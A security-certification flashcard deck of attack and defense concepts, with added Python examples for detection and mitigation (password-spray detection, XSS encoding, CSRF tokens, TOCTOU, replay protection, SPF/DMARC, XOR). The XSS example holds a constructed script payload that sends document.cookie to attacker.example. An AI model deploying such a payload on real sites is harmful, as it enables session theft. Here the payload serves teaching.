Video Concepts I Didn't Know Flashcards

https://youtu.be/9Hd8QJmZQUc?t=7549 (152 cards)

1
Q

Pretexting

A

Social engineering in which the attacker invents a scenario (the pretext) to convince a victim to give up information of value, or access to a system or service

2
Q

Principles for Social Engineering Success

A

Authority - claiming a position or rank the victim defers to
Intimidation - threatening consequences
Consensus-based - someone else, a peer, has already done this
Scarcity - lack of time or availability of an item
Familiarity-based - establish a personal connection
Trust - citing knowledge/experience, or asking nothing in return, to establish a relationship
Urgency - time sensitivity

3
Q

XDR

A

Extended detection and response (XDR) collects threat data from previously siloed security tools across an organization’s technology stack for easier and faster investigation, threat hunting, and response.

4
Q

Worm

A

Type of malware that spreads copies of itself from computer to computer, replicating over the network without human interaction

5
Q

Fileless Virus

A

Type of malware that does not rely on virus-laden files to infect a host. Instead it abuses applications that are commonly used for legitimate activity (e.g. PowerShell, WMI, macros) to execute malicious code in memory, leaving little on disk for file-based scanners to find

6
Q

What is the most cost effective Ransomware countermeasure?

A

User Awareness Training

7
Q

Password Spraying

A

Attacker tries one (or a few) common passwords against many different accounts, to avoid the lockouts that typically come when brute-forcing a single account
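Added detection example (not from the video or this deck): the pattern that distinguishes spraying from single-account brute force is "many distinct accounts, few attempts each, from one source". The log format and the source addresses below are constructed for the example; thresholds are assumptions to tune per environment.

```python
"""Detect password spraying in authentication logs: many distinct accounts,
few attempts each, from one source inside a short window."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from any real system).
SAMPLE_LOG = """\
2024-03-01T09:00:01Z FAIL user=alice src=203.0.113.7
2024-03-01T09:00:04Z FAIL user=bob src=203.0.113.7
2024-03-01T09:00:06Z FAIL user=carol src=203.0.113.7
2024-03-01T09:00:09Z FAIL user=dave src=203.0.113.7
2024-03-01T09:00:12Z OK   user=erin src=203.0.113.7
2024-03-01T09:00:15Z FAIL user=frank src=203.0.113.7
2024-03-01T09:01:00Z FAIL user=alice src=198.51.100.9
2024-03-01T09:01:02Z FAIL user=alice src=198.51.100.9
2024-03-01T09:01:05Z FAIL user=alice src=198.51.100.9
2024-03-01T09:01:08Z FAIL user=alice src=198.51.100.9
2024-03-01T09:01:10Z FAIL user=alice src=198.51.100.9
"""


def parse_line(line):
    """'<ts> <RESULT> user=<name> src=<ip>' -> (datetime, result, user, src)."""
    ts, result, user, src = line.split()
    return (datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), result,
            user.split("=", 1)[1], src.split("=", 1)[1])


def failures_by_source(log_text):
    events = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    by_src = defaultdict(list)
    for ts, result, user, src in events:
        if result == "FAIL":
            by_src[src].append((ts, user))
    return by_src


def find_sprayers(log_text, window=timedelta(minutes=10),
                  min_accounts=5, max_per_account=2):
    """Return {src: sorted accounts} for sources that failed against at least
    `min_accounts` distinct accounts within `window`, with no single account
    tried more than `max_per_account` times. The per-account cap is what
    separates spraying from a brute force of one account."""
    hits = {}
    for src, fails in failures_by_source(log_text).items():
        start = 0
        for end in range(len(fails)):          # sliding window over this source
            while fails[end][0] - fails[start][0] > window:
                start += 1
            counts = defaultdict(int)
            for _, user in fails[start:end + 1]:
                counts[user] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                hits[src] = sorted(counts)
                break
    return hits


def find_single_account_bruteforce(log_text, threshold=5):
    """The opposite shape: one source hammering one account (the lockout case)."""
    hits = {}
    for src, fails in failures_by_source(log_text).items():
        counts = defaultdict(int)
        for _, user in fails:
            counts[user] += 1
        for user, n in counts.items():
            if n >= threshold:
                hits[src] = user
    return hits
```

A real detection would also join successful logins that follow a spray (the `OK` line for `erin` above is exactly the event to alert on), and would key on the target tenant rather than a single source IP, since sprayers rotate through proxies.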

8
Q

Card Cloning

A

Capturing the data stored on access cards, such as RFID/NFC badges and magnetic stripe cards, and writing it to a blank card that then grants the same access

9
Q

Tainting training data for ML

A

Data poisoning: supplying AI and ML algorithms with adversarial training data that serves the attacker's purposes (mis-classifying chosen inputs), or attacks against the privacy of the data the model was trained on

10
Q

Security of ML algorithms

A

Validate quality and security of data sources

Secure infrastructure and environment where AI and ML is hosted
Review, test and document changes to AI and ML algorithms

11
Q

AI

A

(Artificial Intelligence) focuses on smart tasks combining ML and deep learning to emulate human intelligence

12
Q

ML

A

(Machine Learning) a subset of AI: computer algorithms that improve automatically through experience and the use of data

13
Q

Deep Learning

A

Sub-field of machine learning concerned with algorithms inspired by the structure and function of the brain, called artificial neural networks

14
Q

Island Hopping Attack (Supply Chain)

A

Compromise a vulnerable vendor in an organization’s supply chain and then attempt to breach the target organization

15
Q

What defeats a replay attack?

A

Date/time stamps (together with a nonce or sequence number), so a captured message is rejected when it is re-submitted later

16
Q

What attack can occur when a web app contains reflected input?

A

XSS (Cross site scripting)

17
Q

What techniques can defend against XSS attacks?

A

Input validation and filtering (validate data length and data type against an allowlist), and output encoding of any untrusted data placed into a page

18
Q

XSS

A

Cross Site Scripting

A type of injection in which malicious scripts are injected into otherwise benign and trusted websites.

Occurs when an attacker uses a web application to send malicious code to a different user of that application.

Client-side vulnerability: the script runs in the victim's browser with the victim's session.

On the OWASP Top 10 list.

Usually covered by default rule sets in a WAF.
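Added example for cards 16 to 18 (not from the video or this deck): the same reflected search page rendered unsafely and safely, plus the allowlist validation the deck names. The attacker payload and the field rules are constructed for the example.

```python
"""Reflected XSS: the same page template built unsafely and safely."""
import html
import re

# Constructed attacker input that steals the session cookie (example only).
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'


def render_unsafe(query):
    """Reflects the parameter straight into HTML; the browser executes the payload."""
    return f"<p>Results for: {query}</p>"


def render_safe(query):
    """Output-encode for the HTML text context: < > & " ' become entities, so the
    payload is displayed as text instead of being parsed as markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")   # assumed field rule


def validate_username(value):
    """Input validation by length and type (allowlist). This rejects input the field
    should never contain; output encoding is still required for free-text fields."""
    return bool(USERNAME_RE.match(value))


def contains_live_script(markup):
    """Crude check, used here only to contrast the two renderings."""
    return "<script" in markup.lower()
```

Encoding has to match the context the data lands in: `html.escape` is correct for element text and quoted attributes, but data placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead.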

19
Q

XSRF / CSRF

A

Similar to XSS, but exploits a different trust relationship: the trust a website has in an authenticated user's browser. The attacker tricks the victim's browser into sending a forged request (carrying the victim's session cookie) to a site where the victim is already logged in, so the site performs the action as the victim

20
Q

What technique(s) can be used to defend against XSRF attacks?

A

Build web apps that use secure anti-CSRF tokens (unpredictable, tied to the session, checked on every state-changing request), and check the Origin/Referer header to ensure the request came from the local site and not an external source; marking session cookies SameSite also stops the browser from attaching them to cross-site requests
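Added example (not from the video or this deck) of both checks the card names, with requests modelled as dictionaries. The secret, origin and request contents are constructed assumptions.

```python
"""Anti-CSRF defenses: per-session token (HMAC over the session id) compared in
constant time, plus an Origin/Referer check against the site's own origin."""
import hashlib
import hmac
from urllib.parse import urlsplit

SERVER_SECRET = b"rotate-me-example-secret"   # assumption: loaded from config in practice
SITE_ORIGIN = "https://bank.example"          # assumption: the protected site


def csrf_token_for(session_id):
    """Token derived from the session, so a token captured for one session is
    useless for another and nothing needs storing server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """Prefer Origin, fall back to Referer, reject when neither names our origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def accept_state_change(request):
    """request = {'cookies': {...}, 'form': {...}, 'headers': {...}} (constructed shape).
    The cookie is attached automatically by the browser on a cross-site request;
    the token in the form body is not, which is what makes the check work."""
    session_id = request["cookies"].get("session")
    if not session_id:
        return False
    presented = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(csrf_token_for(session_id), presented):
        return False
    return same_origin(request["headers"])


# Constructed requests: a genuine transfer, and a forgery launched from a page on
# evil.example that carries the victim's cookie but no token and a foreign Origin.
GENUINE = {"cookies": {"session": "s-123"},
           "form": {"to": "alice", "amount": "10", "csrf_token": csrf_token_for("s-123")},
           "headers": {"Origin": "https://bank.example"}}
FORGED = {"cookies": {"session": "s-123"},
          "form": {"to": "attacker", "amount": "9999"},
          "headers": {"Origin": "https://evil.example"}}
```

The Origin check is a second layer rather than a replacement for the token: browsers omit Referer in some privacy configurations, and the token check still holds when the header is missing.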

21
Q

XML Injection

A

When user-supplied values are placed unsanitized into XML data or into queries against XML (written in XPath), and those values change the structure of the document or query, it is known as an XML (or XPath) injection attack.

XPath works in a similar manner to SQL, except that it has no access-control layer, so a successful exploit can return the entire document

22
Q

What technique(s) can be used to defend against SQL Injection attacks?

A

Input validation
Use parameterized queries / prepared statements (or stored procedures that take parameters), so data is never concatenated into the SQL text
Limit account privileges (database accounts support granular permissions; the application account should not own the schema)

23
Q

Dereferencing

A

Following a pointer or reference to obtain the value it actually refers to. Dereferencing a null or already-freed pointer crashes the program and is a classic exploitable memory error

24
Q

Time of Check / Time of Use (TOCTOU)

A

Timing vulnerability (a race condition) that occurs when a program checks access permissions on a resource and then uses the resource later, leaving a window in which the resource can be swapped for a different one between the check and the use
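Added example (not from the video or this deck), assuming a POSIX filesystem with symlinks: the "check the path, then open the path" pattern, with the attacker's swap simulated by a callback in the race window, beside the fix of opening once and validating the descriptor you actually hold.

```python
"""TOCTOU: a check on a path, then a use of the same path, with a window between
them in which the path can be re-pointed. The fix checks the opened descriptor."""
import os
import stat
import tempfile


def read_checked_unsafe(path, between=lambda: None):
    """Check the path, then open the path again. The two lookups may resolve to
    different files; `between` stands in for the attacker's timing."""
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("not a regular file")
    between()                        # race window
    with open(path, "rb") as f:      # re-resolves the path, follows a planted symlink
        return f.read()


def read_checked_safe(path, between=lambda: None):
    """Open exactly once without following symlinks, then validate the descriptor.
    A swap before the open is refused by O_NOFOLLOW; a swap after it is irrelevant,
    because the descriptor already refers to the original file."""
    between()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as f:
        if not stat.S_ISREG(os.fstat(f.fileno()).st_mode):
            raise PermissionError("not a regular file")
        return f.read()


def demo():
    """Constructed scenario: a harmless file the program may read, a secret it may
    not, and an attacker who replaces the harmless path with a symlink to the secret."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")
        secret = os.path.join(d, "secret.txt")
        with open(public, "w") as f:
            f.write("harmless")
        with open(secret, "w") as f:
            f.write("TOP SECRET")

        def attacker_swaps():
            os.remove(public)
            os.symlink(secret, public)

        leaked = read_checked_unsafe(public, between=attacker_swaps)

        os.remove(public)                      # reset for the second run
        with open(public, "w") as f:
            f.write("harmless")
        try:
            read_checked_safe(public, between=attacker_swaps)
            blocked = False
        except (PermissionError, OSError):     # O_NOFOLLOW on a symlink raises ELOOP
            blocked = True
        return {"unsafe_leaked": leaked == b"TOP SECRET", "safe_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The general rule: never make a security decision on a name and then act on the name again; act on the handle (file descriptor, opened object) and check the handle.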

25
What authentication system is frequently targeted by replay attacks?
Kerberos (which is why its authenticators carry timestamps and the KDC rejects any older than the allowed clock skew)
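Added example for cards 15 and 25 (not from the video or this deck): the replay defense Kerberos uses, reduced to its parts. Each message carries a timestamp under a MAC so the attacker cannot re-stamp it, the receiver rejects anything outside the clock-skew window, and a short-lived cache rejects exact duplicates inside the window. The key, skew value and clock are constructed assumptions.

```python
"""Replay protection with a MACed timestamp and a seen-cache of recent messages."""
import hashlib
import hmac
import time

SKEW = 300   # seconds; the Kerberos default tolerance is 5 minutes


class ReplayGuard:
    def __init__(self, key, now=time.time):
        self.key = key
        self.now = now          # injectable clock so the behaviour can be tested
        self.seen = {}          # message -> timestamp, pruned to the skew window

    def make(self, body, ts=None):
        """Sender side: 'ts|body|hexmac'. The MAC covers the timestamp."""
        ts = int(self.now() if ts is None else ts)
        msg = f"{ts}|{body}".encode()
        tag = hmac.new(self.key, msg, hashlib.sha256).hexdigest().encode()
        return msg + b"|" + tag

    def accept(self, message):
        """Receiver side. Returns (accepted, reason)."""
        msg, sep, tag = message.rpartition(b"|")
        if not sep:
            return (False, "malformed")
        expect = hmac.new(self.key, msg, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(expect, tag):
            return (False, "bad MAC")          # forged or re-stamped
        ts = int(msg.split(b"|", 1)[0])
        now = self.now()
        if abs(now - ts) > SKEW:
            return (False, "stale")            # outside the clock-skew window
        # Entries older than the window can never be accepted again anyway, so
        # the cache only has to remember the last SKEW seconds.
        self.seen = {m: t for m, t in self.seen.items() if now - t <= SKEW}
        if msg in self.seen:
            return (False, "replay")           # duplicate inside the window
        self.seen[msg] = ts
        return (True, "ok")
```

Timestamps alone are not enough: without the cache, a capture can be replayed within the skew window; without the MAC, the attacker simply edits the timestamp. Kerberos combines all three, plus a session key that the attacker does not hold.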
26
Integer Overflow
Type of arithmetic overflow error in which the result of an integer operation does not fit in the allocated storage and silently wraps around. When the wrapped value is then used as a length or allocation size, it often leads to buffer overflows
27
Resource Exhaustion
When an application continuously allocates additional resources (memory, handles, connections) without releasing them, exhausting machine resources and leading the system to hang or crash
28
What is a tool that can be used to check for memory leaks?
Static Code Analyzer: checks that every memory allocation has a matching deallocation on all code paths
29
SSL Stripping Attack
aka SSL downgrading (affects TLS as well): a man-in-the-middle technique that keeps the victim on plain HTTP to a site that would otherwise be served over HTTPS.
How it works: three entities are involved, the victim's system, the secure web server, and the attacker's system. The attacker intercepts the victim's initial HTTP request (or the HTTP-to-HTTPS redirect), speaks HTTPS to the server on the victim's behalf, and relays plain HTTP to the victim, so the attacker reads and modifies everything in cleartext.
Prevention: serve HTTPS on all pages and implement HTTP Strict Transport Security (HSTS), which tells the browser to use only HTTPS for the domain
30
HSTS
HTTP Strict Transport Security: a response header that instructs the browser to use only HTTPS for the domain for a stated max-age, refusing plain HTTP and certificate-error bypasses. The very first visit is still exposed unless the domain is on the browser preload list
31
Refactoring
A set of techniques used to identify the flow of code and then modify its internal structure without changing its visible behavior. Can be used for good (maintainability) or malicious purposes (rewriting malware so its behavior is unchanged but signatures no longer match)
32
Credential Guard
Windows 10 (Enterprise) feature that uses virtualization-based security to isolate the secrets held by LSASS (NTLM hashes, Kerberos tickets) so they cannot be read out of memory, defeating pass-the-hash tooling
33
Pass the Hash vs Pass the Ticket
Pass the hash targets NTLM (New Technology LAN Manager): the attacker authenticates with a captured password hash without ever cracking it. Pass the ticket targets Kerberos: the attacker reuses a stolen ticket (TGT or service ticket). Both are Windows lateral-movement attacks
34
Bluebugging
Bluetooth attack in which the attacker takes control of a phone (making calls, reading messages) and leaves a backdoor before returning control of the phone to its owner
35
IV Attack
Initialization Vector attack; legacy attack on WEP. WEP's 24-bit IV is sent in the clear and repeats quickly, so by capturing (or replaying and modifying) enough packets the attacker can compute the RC4 keystream generated for a given IV and decrypt every other packet that used it
36
DNS Spoofing
Attacker sends false replies to a requesting system, beating the real reply from the valid DNS server, so the victim connects to an attacker-chosen address
37
What are some countermeasures to prevent DNS attacks?
Allow only authorized changes to DNS
Restrict zone transfers, using only verified forwarders
Log all privileged DNS activity
38
Techniques used in Network based DDoS Attacks
Uses botnets
UDP flooding
ICMP flooding
SYN flooding (abuses the TCP handshake)
39
Domain Reputation
Services and tools that provide information on whether a domain is a trusted email sender or a source of spam. The DNS records SPF (which servers may send on behalf of the domain) and DMARC (what receivers should do with mail that fails SPF/DKIM checks) are commonly used to ensure email comes from approved senders
40
SPF
Text based DNS record, commonly used for email authentication, saying which servers are allowed to send email on behalf of your domain
41
DMARC
Domain-based Message Authentication, Reporting and Conformance: a DNS TXT record that lets a domain owner publish their email authentication practices (SPF and DKIM alignment) and state what action receivers should take on mail that fails those checks (none, quarantine, reject), plus where to send reports
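Added example for cards 39 to 41 (not from the video or this deck): evaluating a sender address against an SPF record and reading the policy out of a DMARC record. The records below are constructed for an example domain, not real DNS data. Only the `ip4`/`ip6`/`all` mechanisms are handled, because `include`, `a` and `mx` need live DNS lookups; a real receiver resolves those too.

```python
"""Evaluate a sender IP against an SPF record and read a DMARC policy."""
import ipaddress

# Constructed TXT records for an example domain (assumptions, not real DNS data).
SPF_RECORD = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 -all"
DMARC_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; pct=100"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(record, sender_ip):
    """Return pass / fail / softfail / neutral / none for sender_ip under `record`.
    Mechanisms are evaluated left to right; the first match decides."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                                  # not an SPF record
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qual = "+"                                     # default qualifier is pass
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qual]                    # catch-all, usually -all or ~all
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qual]
        elif name in ("include", "a", "mx", "exists", "ptr"):
            raise NotImplementedError(f"{name} needs a DNS lookup; out of scope here")
    return "neutral"                                   # nothing matched, no `all`


def dmarc_policy(record):
    """Parse 'tag=value; tag=value' into the fields a receiver acts on."""
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    if tags.get("v") != "DMARC1":
        return None
    return {"policy": tags.get("p", "none"),
            "pct": int(tags.get("pct", "100")),
            "reports_to": tags.get("rua")}
```

The practical check: a domain with `~all` (softfail) or `?all` still lets forged mail through to the inbox in many receivers; `-all` together with a DMARC `p=reject` is what actually stops it.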
42
What are some Layer 2 attacks (OSI model)?
MAC Flooding, MAC Cloning (spoofing), ARP Poisoning
43
What can prevent Collusion?
Separation of Duties Job rotation
44
Where does Espionage originate from?
Externally
45
Where does Sabotage originate from?
Insiders, typically employees, or a trusted vendor
46
What are the countermeasures for the following attack vectors: Direct Access, Wireless, Emails, Supply Chain, Social Media, Cloud?
Direct Access: physical security
Wireless: secure Wi-Fi networks
Emails: user training and phishing simulations
Supply Chain: vendor screening
Social Media: acceptable use policy
Cloud: CASB and configuration management
47
What are some OSINT sources?
Open Source Intelligence: threatcrowd.org, openphish.org, osintframework.com
48
What are some vulnerability databases?
NIST National Vulnerability Database (NVD), linked to CVEs (Common Vulnerabilities and Exposures). www.shodan.io is also listed, though it is a search engine for internet-exposed devices and services rather than a vulnerability database as such
49
CISA
Cybersecurity and Infrastructure Security Agency
50
AIS
Automated Indicator Sharing - CISA capability, enables the real-time exchange of machine-readable cyber threat indicators and defensive measures. Free and can be plugged into SIEMs and Next Gen Firewalls
51
TTP
Tactics, Techniques and Procedures: the behaviors, methods, tools and strategies that cyber threat actors use to plan and execute attacks on business networks. In short, the why and how of cyber attacks, which in turn guides response and prevention
52
Threat Hunting
Proactive, hypothesis-driven process of seeking out attackers and malware already inside your network that automated alerting has not caught
53
Intelligence Fusion
involves industry and government; fusion centers in the US and abroad play an important role in countering cyber threats, attacks, and crime through gathering, analyzing, and sharing threat information
54
IoCs
Indicators of Compromise
55
Who issues Advisories and Bulletins?
Advisories are usually released by government-funded agencies Bulletins are usually released by private companies
56
Maneuver
Refers to a company's efforts to defend itself by disguising its systems (e.g. honeypots, moving or renaming assets), thereby making it difficult for an attacker to successfully infiltrate
57
What will a non-credentialed scan find?
Things like missing patches and some protocol vulnerabilities: it identifies the vulnerabilities an attacker without credentials would easily find, but misses those only visible from inside the host
58
SAST
Static Application Security Testing requires access to source code
59
DAST
Dynamic Application Security Testing does not require access to source code
60
CVSS
Common Vulnerability Scoring System; indicates severity (0 to 10). The CVSS score is not part of the CVE list entry itself; look it up in the NVD (National Vulnerability Database). The CVE list feeds into the NVD
61
NVD
National Vulnerability Database, maintained by NIST and synced with the MITRE list
62
SOAR
Security Orchestration, Automation and Response: centralized alert handling and response automation with threat-specific playbooks. A response may be fully automated or single-click
63
UEBA
User and Entity Behavior Analytics: builds a baseline of each user's (and device's) normal identity use, the data they normally access, the devices they normally use and the servers they normally visit, and alerts on deviations from that baseline
64
MTTD
Mean (average) time to detection
65
SOC
Security Operations Center (Team)
66
White box test
also known as Known environment
67
Black box test
aka Unknown environment
68
Grey box test
aka partially known environment
69
Rules of Engagement
define the purpose of the pentest and what the scope will be for the people who are performing the test on the network. Date, time, systems and constraints will be listed in this
70
Pivoting
aka Island Hopping in pentests: a compromised system is used to attack another system on the same network, following the initial exploitation. If the compromise is introduced at a different time than the attack, it is said to involve persistence
71
Footprinting
an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, infrastructure, and networks to identify opportunities to penetrate them
72
Active footprinting examples
Ping sweep, Tracert analysis, Nmap, extracting DNS info
73
Passive footprinting examples
Browsing the target website, Google search, performing a WHOIS lookup, visiting social media profiles
74
Pseudo-Anonymization
De-identification procedure in which PII fields within a data record are replaced by one or more artificial identifiers, or pseudonyms. Unlike anonymization it is reversible, so the mapping table must itself be protected
75
What are 3 ways to protect data at rest?
Storage Service Encryption (done by the service provider), Full Disk Encryption, Transparent Data Encryption (TDE)
76
Transparent data encryption (TDE)
Used in SQL databases and data warehouses; protects against the threat of malicious activity on stored data by encrypting and decrypting database files, backups and transaction log files at rest in real time, without requiring application changes
77
Read through Test
Incident Response: copies of the IR plan are distributed to the team for review. The team provides feedback about updates needed to keep the plan current
78
Structured Walk-through
Incident Response: members of the DR team gather in a conference room and role-play a disaster scenario. The scenario is unknown to everyone except the moderator. The team works together to document and discuss the appropriate response to the disaster
79
Simulation Test
Incident Response: similar to a structured walk-through, except some of the response steps are actually tried and tested
80
SOA
Service-Oriented Architecture: creation of discrete services that may be accessed by users in a black-box fashion
81
Infrastructure as Code
IaC: management of infrastructure (networks, VMs, load balancers, connection topology) described in code. Just as the same source code generates the same binary, code in the IaC model results in the same environment every time it is applied
82
SDN
Software Defined Networking: enables the network to be intelligently and centrally controlled or programmed using software; the control plane is separated from the data plane, which can be reprogrammed at any time
83
SDV
Software Defined Visibility - provides visibility of the network traffic use. Can collect and aggregate network traffic data and provide better reports to network admins
84
PaaS vs Serverless
Same:
- Devs have to write code
- No server management
Different, PaaS:
- More control over the deployment environment
- Application has to be configured to auto-scale
- Application takes a while to spin up
Different, Serverless:
- Less control over the deployment environment
- Application scales automatically
- Application code only executes when invoked
85
Resource Policies
policies that state what level of access someone has to data or a particular resource
86
Transit Gateway
a network hub that acts as a regional router to interconnect VPC and VPN connections
87
XOR
Exclusive OR, aka addition modulo 2 (binary addition without carry); a secure-coding and cryptography building block. Flips bits in a simple, systematic fashion:
If the plaintext bit and key bit match, the cipher bit is 0
If the plaintext bit and key bit differ, the cipher bit is 1
Applying the same key again undoes the operation, which is why stream ciphers encrypt and decrypt with the same XOR
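Added example for cards 35 and 87 (not from the video or this deck): XOR as the stream-cipher primitive, and why reusing a keystream (the WEP IV problem) is fatal. The keystream generator is a constructed SHA-256 stand-in for RC4(key || IV), chosen only so the example is deterministic and offline; the key and messages are assumptions.

```python
"""XOR encryption, its self-inverse property, and the keystream-reuse break."""
import hashlib


def xor_bytes(a, b):
    """Bitwise XOR of two equal-length byte strings."""
    assert len(a) == len(b)
    return bytes(x ^ y for x, y in zip(a, b))


def toy_keystream(key, iv, n):
    """Toy keystream (hash in counter mode) standing in for RC4(key||IV).
    Same key and IV always produce the same bytes, which is the property the
    IV attack abuses. Not a real cipher."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + iv + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def encrypt(key, iv, data):
    """Stream-cipher encrypt. Decryption is the same call, because
    (p ^ k) ^ k == p."""
    return xor_bytes(data, toy_keystream(key, iv, len(data)))


def recover_from_reuse(c1, c2, known_p1):
    """If two messages were XORed with the same keystream then
    c1 ^ c2 == p1 ^ p2, so knowing (or guessing) p1 reveals p2 without the key."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


KEY = b"example-wep-key"      # constructed
IV = b"\x00\x01\x02"          # a 24-bit IV, as in WEP; only 2**24 distinct values
```

With a 24-bit IV a busy access point cycles through the whole IV space in hours, and the birthday bound means a repeat is likely after only a few thousand packets; each repeat hands the attacker `p1 ^ p2` for that pair. WPA2's CCMP avoids this with a 48-bit packet number that never repeats under one key.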
88
Attestation
Process of confirming that a device is an approved device compliant with company policies (often backed by TPM measurements); common in zero-trust architecture
89
Federation
Collection of domains that have established trust; typically includes authentication and authorization.
Example: federate on-prem Active Directory with Azure AD and use this federation for authentication and authorization. This sign-in method ensures all user authentication occurs on-prem, and allows admins to implement more rigorous levels of access control
90
Multipathing
the establishment of multiple physical routes between a server and the storage device that supports it
91
NIC Teaming
Pairing together two (or more) network interface cards to give maximum throughput. Should one adapter fail, the other ensures the server or client maintains connectivity. Supported by both Windows and Linux
92
PDU/MPDU
Power Distribution Unit / Managed PDU: provides clean power to multiple devices; a managed PDU can additionally be monitored and its outlets controlled remotely
93
SAN (networking)
Storage Area Network: a dedicated network of storage devices containing a large number of fast disks, such as SSDs, usually isolated from the LAN on its own network
94
HBA
Host Bus Adapter: connects servers to storage devices; using two HBAs in each node provides multiple paths
95
SAN Fabric
Collection of servers, storage, switches and other devices. Redundant SAN fabrics enable more robust redundancy
96
RTOS
Real-Time Operating System: runs in smart devices such as wearables, embedded systems and industrial equipment. Designed to work on a very deterministic schedule with specific scheduling guarantees; data is processed immediately, and if a task does not finish within its deadline the associated task or process fails
97
LiFi
Light Fidelity: uses modulation of light intensity (LEDs) to transmit data. Can safely function in areas otherwise susceptible to EM interference; can theoretically transmit at speeds of up to 100 Gbit/s. Only requires working LED lights, but the signal cannot penetrate opaque walls
98
Types (categories) of Security Controls
Managerial (aka administrative), Operational, Technical (aka logical), Physical
99
Juice Jacking
When an unknown USB cable or charging port is connected to your device for power and an attacker uses the data lines to exfiltrate data from (or install malware on) the device
100
PDS
Protected Distribution System: encases network cabling within a carrier, enabling data to be securely transferred between two high-security areas through an area of lower security. Two types: hardened carrier and alarmed carrier
101
DSS
Digital Signature Standard (FIPS 186): specifies three signature algorithms: DSA (Digital Signature Algorithm), RSA (Rivest, Shamir, Adleman) and ECDSA (Elliptic Curve DSA)
102
ECC
Elliptic Curve Cryptography (ECC): asymmetric cryptography using smaller, faster keys, suited to small mobile devices. Created because of the computational cost of the large-prime arithmetic used in traditional asymmetric encryption such as RSA; an ECC key gives equivalent security at a much shorter length. Attractive for resource-constrained systems
103
Perfect Forward Secrecy
Assures that session keys will not be compromised if the long-term secrets (private keys) are later compromised. The system generates a fresh, ephemeral key pair for each session instead of deriving session keys deterministically from the long-term key, so the same input produces a different session key every time. Costs more computing power than reusing a single long-term private key
104
What keys does a certificate contain?
Its embedded public key, which corresponds to a private key held only by the certificate's subject; the private key is never in the certificate
105
IPSec Modes
Transport Mode: only the payload is protected; the original IP header is kept, so the endpoint addresses are visible and determine the IPSec policy applied; good for ESP host-to-host traffic
Tunnel Mode: the entire original IP packet is encapsulated inside a new IP packet, so two IP headers are sent; the inner packet determines the IPSec policy that protects its contents; good for VPNs and gateway-to-gateway security
106
DNS Record types for Security
SPF - Sender Policy Framework: DNS TXT record listing which servers may send mail for the domain, used by receivers to reject forged senders
DMARC - Domain-based Message Authentication, Reporting and Conformance: DNS TXT record that tells receiving mail systems (ISPs) what to do with mail that fails SPF/DKIM checks, helping to block phishing and spear phishing that spoofs the domain
107
DNSSEC
Provides origin authentication and integrity for DNS records; it does not encrypt them or restrict who can read them. Each record set is digitally signed, producing an RRSIG record that resolvers validate up the chain of trust, protecting against spoofing and cache poisoning
108
Homograph Attack
leverages similarities in character sets to register phony international domain names (IDNs) that appear legitimate to the naked eye
109
Jump Server
Hardened host in a screened subnet/DMZ through which admins connect remotely to reach internal systems; the only permitted path in, so it is tightly monitored
110
Inline (IDS/IPS Mode of Operation)
aka in-band: traffic passes through the NIDS/NIPS (typically placed on or near the firewall), so a NIPS can actively block malicious packets; adds an additional layer of security but is a potential bottleneck and point of failure
111
Passive (IDS/IPS Mode of Operation)
aka out-of-band: the NIDS receives a copy of traffic (SPAN/mirror port or network tap); traffic does not go through it, so it can alert but cannot block
112
Types of Firewalls
WAF: Web Application Firewall; protects web apps, can protect against attacks like XSS, CSRF and SQL injection
NGFW: Next-Generation Firewall; deep packet inspection, moved beyond port/protocol inspection and blocking; adds application-level inspection, intrusion prevention, and brings in threat intelligence from outside the firewall
Deep Packet Inspection: inspects and filters headers and body; can protect against viruses, spam, malware and intrusion
UTM: Unified Threat Management; multi-function device including firewall, IDS, IPS, TLS/SSL proxy, etc. Very common in SMBs
113
Stateless
Watches each packet in isolation, restricting or blocking based on source and destination addresses, ports and other static values. Not aware of traffic patterns or connection state; faster and performs better under heavy traffic loads
114
Stateful
Tracks traffic streams from end to end in a state table; aware of the connection a packet belongs to, so it can admit replies to outbound requests and reject packets that fit no known session. Better at identifying unauthorized and forged communications
115
Network Devices
Firewall: filter layer 3 thru 7 Switch: filter layer 2, sometimes 3 Routers: layer 3 Gateways: layer 3
116
OSI Model
Open Systems Interconnection
7 - Application
6 - Presentation
5 - Session
4 - Transport
3 - Network
2 - Data Link
1 - Physical
Bonus, data unit names: 4 - Segments, 3 - Packets, 2 - Frames, 1 - Bits
117
ingress
inbound traffic
118
egress
outbound traffic
119
Wireless Cryptographic Protocols
TKIP: Temporal Key Integrity Protocol; replacement for WEP, implemented in 802.11 under the name WPA
